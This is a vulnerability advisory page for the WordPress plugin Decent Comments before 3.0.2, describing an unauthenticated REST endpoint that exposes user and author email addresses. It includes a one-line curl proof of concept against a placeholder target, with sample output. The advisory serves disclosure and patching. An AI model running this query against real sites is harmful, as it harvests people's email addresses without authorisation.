Decent Comments < 3.0.2 – Unauthenticated Email Address Disclosure | CVE 2026-7385 | Plugin Vulnerabilities

Description

The plugin does not restrict access to comment author email addresses and post author email addresses via its REST API endpoint, allowing unauthenticated attackers to enumerate registered user email addresses.

Proof of Concept

curl -s "https://TARGET/wp-json/decent-comments/v1/comments" | jq '.comments[] | {author: .author, author_email: .author_email, post_author_email: .post_author}'

# Example output (version 3.0.1):
# {
#   "author": "Test User",
#   "author_email": "testuser@example.com",
#   "post_author_email": "admin@example.com"
# }

Affects Plugins

decent-comments

Fixed in 3.0.2

References

CVE

Classification

Type

SENSITIVE DATA DISCLOSURE

OWASP top 10

A3: Sensitive Data Exposure

CWE

CVSS

Miscellaneous

Original Researcher

Vaibhav Narkhede

Submitter

Vaibhav Narkhede

Verified

Yes

WPVDB ID

1c5949d0-cf50-45d3-a7e2-2f94cdb42405

Timeline

Publicly Published

2026-04-29 (about 21 days ago)

Added

2026-04-29 (about 20 days ago)

Last Updated

2026-04-29 (about 20 days ago)

Other

Published

Title

Published

2025-10-09

Title

AppExperts <= 1.4.5 - Unauthenticated Sensitive Information Exposure

Published

2024-08-28

Title

Premium SEO Pack – WP SEO Plugin <= 1.6.002 - Unauthenticated Information Exposure

Published

2025-04-03

Title

TailPress <= 0.4.4 - Unauthenticated Sensitive Information Exposure

Published

2026-01-08

Title

NextGEN Download Gallery <= 1.6.2 - Unauthenticated Information Exposure

Published

2025-02-28

Title

Database Backup and check Tables Automated With Scheduler 2024 < 2.36 - Authenticated (Administrator+) Sensitive Information Exposure